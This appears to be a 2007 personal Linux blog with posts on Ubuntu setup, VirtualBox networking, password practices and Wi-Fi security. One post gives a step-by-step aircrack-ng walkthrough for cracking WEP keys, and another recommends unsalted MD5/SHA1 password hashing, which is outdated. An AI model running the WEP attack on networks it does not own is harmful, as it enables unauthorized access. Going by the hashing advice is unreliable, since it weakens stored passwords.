Friday, December 28, 2007

How to rename the extension of multiple files in ubuntu

Recently I needed to rename the extension of many files in one step.
The 'mv' command didn't work, and I tried with different alternatives, such as using 'for' commands.
Finally, I found that Debian based distributions have the 'rename' command.
Following, the syntax for renaming '.jpg' files to '.jpeg'.

rename 's/\.jpg/.jpeg/' *.jpg

Cheers!

Versión en español:
http://es.tuxero.com/2007/12/cmo-renombrar-la-extensin-de-mltiples.html

Thursday, November 22, 2007

Closed source

I'm working on a project in which I have to connect to a database used by a small ERP software.
The database runs over a SQL Server 2005. "No problem!" I thought at all times, because I've been working with SQL Server since its 7.0 release (and I use SQL Server 2005 practically since it was available).
How disappointed I was when I found that the table names were TRAxxx, SUAxxx, STAxxx, etc (where xxx is a number). There are several prefixes, and hundreds of tables for each prefix. I've done reverse engineering in the past, and it doesn't scare me at all (as a matter of fact, I quickly found the tables I need).
I even found that in the tables I examined there are NO enforced relationships. A note to the developers: please read something on referential integrity.

I think there are two main reasons that causes someone to name tables incorrectly:
- Bad database design.
- An attempt to hide database contents.

Without going to the extreme of proposing these people to release the source code, I believe that there are intermediate points. The companies that buy software licenses should own the information, and this includes the possibility of using the data as they see fit.

Is regrettable what I found, in terms of database design, and regarding their cryptic way of naming tables.

I think that when we develop software, our work structure should be clear and transparent. We must give our customers the freedom of choice. We already charged for our work, we do not need to enslave our customers. Let them choose us for our solution's quality rather for lack of choice.

Versión en español:
http://es.tuxero.com/2007/11/closed-source.html

Friday, October 26, 2007

Blackberry 8800 acquired

I love technology since I was a kid, but lately I am getting irritated with the technological excess.
At moments I feel over-connected. Email accounts, IM, cell phone, SMS, everything demanding my attention. When the idea of having a blackberry came out for work reasons, I really did not want to do it. It felt too much.
Work comes first, so I finally acquired a Blackberry 8800.

How wrong I was.

Now that I have it, I wonder how did I manage to live before without it. Beyond that "it's a cool gadget", its utility is incredible.
The graphical interface is not that pretty, functionality is maximized, leaving aside the design. I don't complain, but I think they could have done it 'just a little bit' more cute.

I think that the best thing I have to say about it is that before I worried about having to check my mail. Many times working in the street, visiting clients, without time to go somewhere with WiFi (the are rare in my city) and open my notebook. That anxiety disappeared. Emails I care about arrive to my BB, with the push-mail technology. It's fabulous, I feel archaic for having waited so long to have one!

Well, I have to end now, because I have some emails to reply in the BB :-D

Cheers!

Version en español
http://www.tuxero.com/2007/10/blackberry-8800-adquirido.html

Technorati tags:

Sunday, October 14, 2007

Using Ubuntu Gutsy Beta

I'm still using Ubuntu Gutsy Beta, and with much pleasure I discovered that it detects and uses the built in Memory Stick card reader that comes with my Sony Vaio VGN-N350FE. It must say that previous versions did not detect the card reader.
The system is very stable. The only problem is that eventually I have trouble when shutting down the notebook.
I installed the 'Advanced Desktop Effects Settings' for configuring Compiz Fusion, and it is a very nice way to waste time. It has many effects, some of them very amusing. The previous version didn't have a so detailed configuration utility. It's very cool to completely personalize the desktop effects.
I still have pending to test the virtualization, but I probably wait for the final version to be released (it's around the corner!).
In short, it seems that it will be a very good version of Ubuntu, and the truth is that they have widely extended compatibility with notebooks.

Versión en español:
http://www.tuxero.com/2007/10/usando-ubuntu-gutsy-beta.html

Technorati tags:

Monday, October 1, 2007

Testing Ubuntu Gutsy Beta - Screenshots

I installed Ubuntu Gutsy Gibbon Beta in my Sony Vaio VGN-N350FE for testing.
The installation went almost without problems. The only thing is that at a moment it threw an error saying that the partition for importing settings was already mounted, even though I indicated not to perform such importation. I clicked the 'Continue' button, and the installation completed correctly.
I find the system very stable. The brightness control works correctly, which means they fixed it (it didn't work in previous versions). Suspension and hibernation also work, though, after trying a few times, I had trouble to turn the machine off, I don't know if it is because of this, or for some other reason.
So far, I tested the following things:

Screen configuration
Multiple monitors support is now much more intuitive, editing the /etc/X11/xorg.conf file (which could be cryptic for beginners) is no longer needed.
As you can see in the screenshot, the configuration utility is very intuitive.

Printers configuration
This version includes automatic printer configuration, when they are plugged in. I couldn't test this function, but I have a HP 2600n network printer, and to add it was really simple.
I opened the printers configuration utility.
In this application, I clicked the 'New printer' button. I entered the appropriate values for my printer, and the clicked the 'Forward' button.This opened the drivers selection window. I chose 'HP', and then 'Color Laserjet 2600n'.

Then it asked me to enter the printer name. After doing so, I clicked the button 'Apply'.
Done! The printer was correctly installed. The test page was printed correctly.

Video codecs
I tried to play a video file, and it said that video codecs were not available.
I clicked the 'Search' button, and it found the appropriate codecs.
After selecting them, it prompted for confirmation for installing restricted software.
After this, it was correctly installed.

In short

So far, it is a really stable system, it is more compatible with my notebook, and easier to use. As I continue to test it, I'm going to keep posting testing results.

Cheers!

Friday, September 28, 2007

Ubuntu Gutsy Gibbon (7.10) Beta available

Canonical made public a new beta version of Ubuntu Gutsy Gibbon.
I'm downloading the version, so when I test it, I'm going to comment how it went. It's a expected version, because it includes better support for notebooks, graphical configuration tool for X, better support for dual monitors, better support for restricted drivers, compiz fusion, Apparmor, NTFS writing support, automatic printer configuration (I want to see this!), desktop search, Gnome 2.20 and a long etcetera.
Link: http://www.ubuntu.com/testing/gutsybeta
Cheers!
Versión en español:
http://www.tuxero.com/2007/09/ubuntu-gutsy-gibbon-710-beta-est.html

Friday, September 21, 2007

How to store passwords in a database

Often we write applications that must perform users and permissions validations. In these cases it is rather common that the developers include fields like 'User' and 'Password' in the users table. Also happens that the passwords are stored in plain text, which brings security problems, as we will see next.
Database administrators should NOT have access to the passwords. Also, if an attacker gains access to the database, he'll get a very easy way to get user's passwords.
Besides, depending on the database configuration, it is possible that when we query "SELECT * FROM USERS WHERE USER='my_user' AND PASSWORD='my_password';", the password is case insensitive. This facilitates the attackers to test different passwords because the case (upper and lower) is not being validated.
Sometimes the developers encrypt the passwords using some encryption algorithm. Care must be taken for the following reasons:
- In general these algorithms are bidirectional, which means that if we have the encryption key, we can get the original password from the ciphered text.
- Good algorithms are well known and checked by the community of developers and mathematicians. You must not trust those who offer 'magic' formulas or do not want to make the algorithm public.
Solution:
What we must do is to hash the password (e.g. using SHA, SHA1, SHA2, MD5, etc) to obtain a scrambled code from which the original text cannot be obtained. This must be done each time the user supplies a password, be it when logging in, or when the user modifies his password. Remember to store the result of hashing the password supplied by the user in the database.
When we look for the user, the SQL query would look like this: "SELECT * FROM USERS WHERE USER='my_user' AND PASSWORD='5eb942810a75ebc850972a89285d570d484c89c4';".
Note: before, the user could ask the administrators for the passwords if he forgot it, now, you must implement a password blanking routine for these cases.
Hope this helps.

Cheers!

Versión en español

Technorati tags:

Tuesday, September 18, 2007

Virtual Box 1.5 networking in Ubuntu Feisty

As I published in my previous post, I installed Virtual Box 1.5.
Now that I am using it, I found a couple of problems. First, I wanted to copy the virtual disks (VDI), and to my surprise, to copy the files just won't do the trick. We must use the disks cloning tool, as in the following example:

VBoxManage clonevdi source.vdi destination.vdi

The next problem I had is that the network didn't work in 'Host Interface'. After looking at the help, and a few rounds with google, ubuntuforums and etcetera, I found a way to make it work. Here's a mini howto.
First we install necessary packages:
sudo apt-get install bridge-utils
sudo apt-get install uml-utilities


Then we must define network interfaces. We edit the interfaces file:
sudo gedit /etc/network/interfaces

We add the necessary interfaces (replacing 'user' for the user that will use the virtual machines, and obviously a correct IP):
auto br0
iface br0 inet dhcp
bridge_ports eth0 br0

auto tap0
iface tap0 inet manual
up ifconfig $IFACE 192.168.0.150 up
down ifconfig $IFACE down
tunctl_user user


We restart the network:
sudo /etc/init.d/networking restart


We add the user to the uml-net group:
sudo gpasswd -a user uml-net


According to the help, this shoud work, but no. I found that for this to work we must execute:
sudo chmod 0666 /dev/net/tun
sudo chmod 0666 /dev/vboxdrv


After this, we may set 'Host Interface', and in the interface name we enter 'tap0'.

And that's it.

Cheers!
Versión en español

Monday, September 17, 2007

HP Laserjet 1018 in Ubuntu Feisty

I recently had to set up a HP Laserjet 1018 printer in Ubuntu Feisty.
Simple as it looks, it is not.
The printer gets added correctly, and when I try to print a test page, the process goes without errors, except: it does not print!
This seems bad enough, because, if it cannot print, at least it should notify the user.
Searching, I found a way to make it work here.
There it says we must download and compile the drivers from here.
Following these steps I was able to install the printer correctly, but nevertheless, it was a rather complex process.
Cheers!

Versión en español

Technorati tags:

Wednesday, September 5, 2007

Virtual Box 1.5.0 released

Innotek's people amazed me with the new version of Virtual Box.
Virtual Box is an open source virtualization system (free and libre) that allows us to have virtual machines on a host operating system.
I downloaded and installed it in a matter of minutes (I use ubuntu). The installation was a breeze. To install a virtual machine was truly simple.
What amazed me the most was the 'Seamless mode' that allows to have host operating system windows mixed with the guest operating system windows.
I am lover of virtualization, due the great benefits that provides us. This is great news for me, since other solutions such as VM Ware Server (free, not libre) are not always easy to install and implement.

I saw it at genbeta.
You can download it at virtual box's site.:

Cheers!

Versión en español

Monday, September 3, 2007

How to delete useless Windows Files in Ubuntu Linux

After using Windows for a long time, my music and photos folder where filled with 'desktop.ini' and 'Thumbs.db' files. For a while I've been only using Ubuntu Linux, so I decided to delete those files.
To do it, you may use this command (have in mind that this goes throughout every sub folder in the selected path, so don't do it on the root folder):

find /my_path -type f -name "desktop.ini" -exec rm -f {} \;
find /my_path -type f -name "Thumbs.db" -exec rm -f {} \;
We may also use this command to delete album covers in our music folders:
find /music_path -type f -name "*.jpg" -exec rm -f {} \;
As you see, this can be used to delete any file (or type of file) recursively in folders. You may use it to delete other files, as long as you take care not to delete files you need or want.
If you want to examine the files that are going to be deleted before doing it, you should execute the same command, changing 'rm' for 'ls', like this:
find /my_path -type f -name "desktop.ini" -exec ls -f {} \;
In this way you may control the list of files to delete.
I hope this helps.

Cheers!

Technorati tags: , ,
Versión en español

Thursday, August 30, 2007

How to make strong passwords

Our passwords can be guessed or obtained by dictionary attacks. To protect our private data and resources, we must have passwords that cannot be guessed and that don't appear in dictionaries.

Next, a few recommendations to make our passwords more secure:
You must avoid using dates, names and dictionary words.
You should use letters (lower case and upper case), mixed with numbers and symbols.
You should change your passwords periodically.

Given the difficulty that may involve remembering a password like 'ñF(fh3#"$j9', you can use the following technique to make the labor less hard:
Think a phrase (five or more words) that means something to you. In this example I'll use 'To be or not to be'. Then take a number (three or four digits) that you can remember (I'll use 1234). No with all this, you take the first letter of each word (one upper case, one lower case) and you mix it with the digits of the number you chose. If you always use the same keyboard layout (or if you can remember it by heart), you may convert numbers into symbols by pressing the 'shift' key.
Following this example , my keyword would be:
T1b"O3n$Tb

This is just a base, you may alter this idea, for instance you may begin with numbers, or two letters for each number, or use the second letter of each word, etc. Use your imagination!

You now have the basis for having strong passwords easy to remember.

Cheers!
Technorati tags: ,
Versión en español

Technorati tags:

Tuesday, August 28, 2007

How to make a Wireless network more secure

I decided to gather a series of recommendations to make WiFi networks more secure.

Please have in mind that every system is vulnerable, it is only about reducing the risk of being vulnerated.

I divide recommendations in two parts: AP (Access Point) and the workstation.

At the AP

  • Change the SSID by default. It's not good to have those from factory (ej: Linksys, 3COM, etc.)
  • Change AP's default password. It is relatively easy to find out the AP's model, and from there to know the default admin password.
  • Deactivate SSID broadcasting. This doesn't add much security, but discourages 'casual hacker'.
  • Use WPA or WPA2. Don't let the network without security. WEP is vulnerable (see my other post http://en.tuxero.com/2007/08/howto-crack-wep-sony-vaio.html), however if WPA or WPA2 are not available, WEP is better than nothing.
  • Filter by MAC Address. Even if a MAC address can be changed, this is more complicated for common people.
  • Deactivate DHCP. Unless it is not possible, use static IP addresses.
  • Limit the maximum number of IPs in the DHCP. This would limit the quantity of devices connected (however more devices can be added with static IPs).
  • Turn the AP off when not in use. This is not always possible. For home networks, this option is good, as long as you don't let your PC turned on for accessing it from the internet.
  • Change the passwords often. With time, passwords can be obtained. To change them regularly it is a good practice.
  • Limit the AP power. This is quite effective. It is always good to lower the power at the minimum (verifying that the farthest device can connect correctly). This lowers the chances of connection from distant devices (eg: someone in the street).
  • Choose AP's location wisely. It is good to put the AP in the center of the house, away from windows and exterior walls (see preceding point).
  • Use secure passwords. It is good to use passwords that mix letters, numbers and signs. If possible, use entirely random hexadecimal passwords.
  • Disable AP's remote administration. This impedes someone from outside the network from accessing the AP.
  • Activate Firewall at the AP.

At the workstation

  • Verify who installed the AP. There are APs planted to capture network traffic. You should check it is a legitimate AP.
  • While surfing the net, do not enter passwords, or sensitive information in pages not marked as secure. Before entering credit card numbers, bank or email passwords, check that the site address begins with 'https://'.
  • Do not share public folders. This is a very common mistake: to have shared folders while connecting to a (public) wireless network.
  • Verify you have an active firewall. When connecting to public wifi networks, you are exposed to attack from other devices inside the network.
  • Shutdown the wireless card when not in use. Besides the obvious energy savings, an attacker could create an 'ad-hoc' network with the active NIC.
  • Use a VPN. If you have a VPN (generally available in corporate environments), this makes the connection more secure.

Always remember that we are 'just making it more difficult' to hackers. We should avoid making it easy ;-)

You can check these links too:



Cheers!

Versión en español

Technorati tags:

HOWTO Crack WEP - Sony Vaio

Based on a professional need, I had to demonstrate that WEP can be cracked. Even though I 'knew' this could be done, I never actually did it myself.

Note: This is only for researching, learning, and security checking purposes. This shouldn't be used to crack networks owned by other people. To attack and to vulnerate networks (or other resources) is bad, and illegal.

Doing some research, I found that my Sony Vaio VGN N350FE wireless card (an Intel 3945ABG), didn't allow certain things from linux, among them one necessary to demonstrate this vulnerability.

If you read my previous posts, you'll see that this is not the first problem I find with hardware.

Also it isn't the first I find a solution for :-)

I found a howto at http://foro.seguridadwireless.net/index.php?topic=3227.0 that I used as a base.

Next, the steps I followed to crack WEP.

We need a linux distribution availabe at http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. We download the CD image and we burn it.

We boot the notebook with WifiWay (it must be able to boot from optical drives).

Once started, we open the X:

startx

We set the channel of the AP (Access Point) in the NIC.

echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel

We get the BSSID, the channel and the ESSID.

airodump-ng rtap0

We finish the execution with CONTROL-C, and we set the BSSID (an HEX number with 6 positions) in the NIC.

echo 'AP_BSSID' > /sys/class/net/wifi0/device/bssid

Once we do this, we start capturing.

airodump-ng -c CAPTURE_CHANNEL -w CAPTURE_FILE rtap0

We open a new window and we set speed at 2 mbps:

echo '2' > /sys/class/net/wifi0/device/rate

We activate the nic.

ifconfig wifi0 up

We look for our MAC address, it's the first 12 numbers stated in HWaddr

ifconfig

We initiate an association with the AP.

aireplay-ng -1 0 -a AP_BSSID -h MAC_ADDRESS_WIFI -e AP_ESSID wifi0

We open another terminal and we start injecting traffic:.

aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h MAC_ADDRESS_WIFI wifi0

This should incremente the number of data in the capture window (it takes a while before it starts incrementing).

When we have over 100.000, we may extract the key by executing:

aircrack-ptw CAPTURE_FILE.cap

This should give us the key in hex format.

I hope this is useful to you.


Technorati tags: , , , , , ,


Cheers!

Versión en español

HOWTO Ubuntu Feisty + Sony Vaio VGN N350FE

With some patience, searching in forums, researching, and some luck, I managed to solve the energy problem of my laptop: a Sony Vaio VGN-N350FE using Ubuntu Feisty.

Warning: if you dare to follow this howto, be aware that the system may become unstable, unusable, or worse, like damaging the hardware. Only follow these steps at your own risk.

On a clean installation of Ubuntu Feisty, I update every package proposed by the update manager.

I install the kernel 2.6.22.9 (available in Gutsy), for which we need to include the corresponding repositories.

On the command line we execute:

sudo gedit /etc/apt/sources.list

In the editor, we add the following lines at the end of the file.

deb http://archive.ubuntu.com/ubuntu/ gutsy main restricted
deb http://archive.ubuntu.com/ubuntu/ gutsy universe

Save and close. Then execute this:

sudo apt-get update

After this, it's possible that the update manager offers us to update a bunch of packages (actually from Gutsy). We shouldn't do it. Only do what's stated here.

We execute:

sudo apt-get install linux-backports-modules-2.6.22-9-generic linux-headers-2.6.22-9 linux-headers-2.6.22-9-generic linux-image-2.6.22-9-generic linux-restricted-modules-2.6.22-9-generic linux-ubuntu-modules-2.6.22-9-generic

Since we just installed a new kernel, I believe it's a good idea to restart the notebook. After restarting, we open a new terminal window and we execute:

sudo apt-get install powertop cpufrequtils libncursesw5

Now we must remove Gutsy's repositories. We execute:

sudo gedit /etc/apt/sources.list

We comment the lines we inserted before, by inserting # at the beginning of the lines.

We update the package manager:

sudo apt-get update

Now we make sure that sony's energy management modules are installed. We execute:

sudo modprobe sony_acpi
sudo modprobe sonypi

We make these modules to load automatically on boot:

sudo gedit /etc/modules

We add the two following lines to the end of the file:

sony_acpi
sonypi

We execute this to be able to use brightness controls:

sudo locate -u && for i in $(locate lcd-???-brightness); do sudo cp $i $i.bak; sudo sed -i '1 s|#!/bin/sh|#!/bin/bash|g' $i; done

Now we can add the brightness control to Gnome's Panel. After this, reset the notebook, so the brightness control is active.

When we use our laptop on battery, we need to execute on a terminal:

sudo powertop

This opens a text application that tells us which elements are consuming power, and recommends us to carry on certain actions to improve battery's use.

Before this, the battery lasted less than half hour, after this, more than four hours.

For references, I used these posts:

http://www.ubuntugeek.com/howto-upgrade-kernel2622-9-generic-in-feisty-fawn.html
http://ubuntuforums.org/showthread.php?t=479034
http://tuxeando.wordpress.com/2007/05/27/probando-el-nuevo-kernel-2622/


Technorati tags: , ,


Cheers!

Versión en español

Tuning my notebook

I recently bought a Sony Vaio VGN-N350FE
At my home-office I have a color laser printer HP 2600n, and with my brand new notebook, I cannot print. Windows Vista throws a "Data Execution Prevention" error, and the spool service dies (before this, I never had any troubles - not with Windows XP, not with Ubuntu).
I googled a lot, and I found no solution. It seems to be a compatibility problem between HP drivers and Windows' new version.
This (and other motives) make me decide to install ubuntu feisty in this machine. Everything is fantastic, except the energy management issue. Keyboard function keys do not work, and following some tutorials led to no solution (apparently, I have a 'too' new model).
So in the mean time, if I use Windows, I cannot print, and if I use Linux, battery duration is less than acceptable.
I can assure you, my estimated reader, that this will continue.

Versión en español

First step

Hello!
This is the first tuxero post, with much expectation and desires.
This is a short salutation, since the main thing of this blog is its contents, not the introduction.
Soon, soon, I'll be adding new contents.

Cheers!

Versión en español